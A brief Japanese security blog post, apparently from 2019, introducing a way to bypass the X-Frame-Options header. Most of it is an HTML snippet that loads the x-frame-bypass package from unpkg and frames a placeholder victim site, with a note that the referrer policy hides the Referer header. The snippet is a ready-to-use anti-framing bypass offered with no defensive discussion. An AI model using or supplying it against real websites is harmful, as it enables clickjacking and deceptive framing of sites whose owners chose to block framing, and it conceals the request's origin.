Marsの5εcur1ty備忘録

不定期的にCTF、脆弱性検証、バグバウンティレポート分析など、情報セキュリティを中心とした技術ブログを更新します。

X-Frame-Optionのバイパス紹介

Web

GitHub

github.com

Code:

    <script src="https://unpkg.com/@ungap/custom-elements-builtin"></script>
    <script type="module" src="https://unpkg.com/x-frame-bypass"></script>
    <iframe is="x-frame-bypass" src="https://victimxxxxxxxxxx.com" width="100%" height="100%" referrerpolicy="no-referrer" />
    </html>

注釈:referrerpolicy="no-referrer"はiframeタグ内のHTTPリクエストのRefererフィールドを隠すために使用するもの。

Copyright Mars 2019